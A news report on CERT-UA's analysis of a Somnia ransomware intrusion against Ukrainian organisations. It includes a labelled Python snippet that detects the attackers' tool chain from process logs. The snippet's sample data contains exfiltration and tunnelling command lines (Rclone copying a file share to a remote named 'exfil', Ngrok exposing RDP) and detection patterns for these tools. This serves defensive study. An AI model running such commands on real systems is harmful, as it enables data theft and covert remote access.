Russian hacktivists encrypted systems and caused disruptions at several Ukrainian organizations using a new version of the Somnia ransomware. CERT-UA confirmed the incident and blamed From Russia with Love (FRwL), also known as the Z-Team, which it tracks as UAC-0118.
It is worth noting that the accusations are not groundless: the hacktivists announced the creation of Somnia in their Telegram channel and even posted evidence of attacks on a Ukrainian organization engaged in the production of tanks.
An investigation conducted by CERT-UA showed that the attack began with the victim downloading and running a file posing as software called “Advanced IP Scanner”, which actually contained the Vidar infostealer. This malware steals Telegram session data, which, in the absence of two-factor authentication and a passcode, allows attackers to gain access to the victim's account.
As was established, the hackers needed the Telegram account in order to steal VPN connection data (including certificates and authentication data). Having gained remote access to the organization's computer network over the VPN, the attackers conducted reconnaissance (using Netscan), launched a Cobalt Strike beacon and stole valuable data using Rclone. In addition, there are signs that AnyDesk and Ngrok were also launched.
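As an added illustration, not part of the original report and not CERT-UA's own detection logic, the following Python snippet shows how the post-access tool chain described above could be correlated from process-creation telemetry: a copy of "Advanced IP Scanner" run from a download or temp folder, Netscan, Rclone with a copy/sync command, AnyDesk and Ngrok seen on the same host. The log events, host names, paths and regex patterns are constructed assumptions for this example; a genuine Advanced IP Scanner installed under Program Files is deliberately not flagged, and the Cobalt Strike beacon, which has no fixed process name, is left to other detections.

```python
"""Toy correlation of the tool chain from the Somnia incident write-up.

Sample process-creation events below are constructed for this example;
the regexes are illustrative assumptions, not published indicators.
"""
import re
from collections import defaultdict

# Each stage label maps to a pattern matched against the lowercased
# image path plus command line of one process-creation event.
STAGE_PATTERNS = {
    "fake_ip_scanner": re.compile(r"advanced[ _-]?ip[ _-]?scanner.*\.exe"),
    "netscan": re.compile(r"\bnetscan(?:\.exe)?\b"),
    "rclone": re.compile(r"\brclone(?:\.exe)?\b.*\b(copy|sync|move)\b"),
    "anydesk": re.compile(r"\banydesk(?:\.exe)?\b"),
    "ngrok": re.compile(r"\bngrok(?:\.exe)?\b"),
}

# The legitimate scanner lives under Program Files; a copy executed from
# one of these directories is what makes the "Advanced IP Scanner" hit suspicious.
SUSPICIOUS_DIRS = ("\\downloads\\", "\\temp\\", "\\appdata\\local\\temp\\")

# Constructed sample telemetry (host, image path, command line).
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"c:\users\alice\downloads\advanced_ip_scanner_2.5.exe",
     "cmdline": "advanced_ip_scanner_2.5.exe"},
    {"host": "ws-02", "image": r"c:\program files (x86)\advanced ip scanner\advanced_ip_scanner.exe",
     "cmdline": "advanced_ip_scanner.exe"},
    {"host": "ws-01", "image": r"c:\users\alice\appdata\local\temp\netscan.exe",
     "cmdline": "netscan.exe /range:10.0.0.1-10.0.0.254"},
    {"host": "ws-01", "image": r"c:\users\alice\appdata\local\temp\rclone.exe",
     "cmdline": "rclone.exe copy c:\\fileshare remote:exfil -P"},
    {"host": "ws-01", "image": r"c:\users\alice\appdata\roaming\anydesk\anydesk.exe",
     "cmdline": "anydesk.exe --service"},
    {"host": "ws-01", "image": r"c:\users\alice\downloads\ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389"},
    {"host": "srv-03", "image": r"c:\program files (x86)\anydesk\anydesk.exe",
     "cmdline": "anydesk.exe"},  # routine IT use, one stage only
]


def classify(event):
    """Return the list of stage labels a single event matches."""
    text = f"{event['image']} {event['cmdline']}".lower()
    hits = []
    for stage, pattern in STAGE_PATTERNS.items():
        if not pattern.search(text):
            continue
        # Only flag the scanner when it runs from a download/temp location.
        if stage == "fake_ip_scanner" and not any(
            d in event["image"].lower() for d in SUSPICIOUS_DIRS
        ):
            continue
        hits.append(stage)
    return hits


def correlate(events, min_stages=2):
    """Group matched stages per host; report hosts showing at least min_stages."""
    per_host = defaultdict(set)
    for event in events:
        for stage in classify(event):
            per_host[event["host"]].add(stage)
    return {host: sorted(stages) for host, stages in per_host.items()
            if len(stages) >= min_stages}


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Raising `min_stages` trades sensitivity for precision: a single AnyDesk launch on a server is ordinary administration, while the same host showing a dropped scanner, network discovery, Rclone exfiltration and a tunnelling tool within one investigation window is the pattern the report describes.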
Specialists noted that Somnia has been modified. Where the first version of the program used the symmetric 3DES algorithm, the second version implements AES. And given that the key and the initialization vector are generated dynamically, CERT-UA assumes that this version of the malware does not provide for data decryption.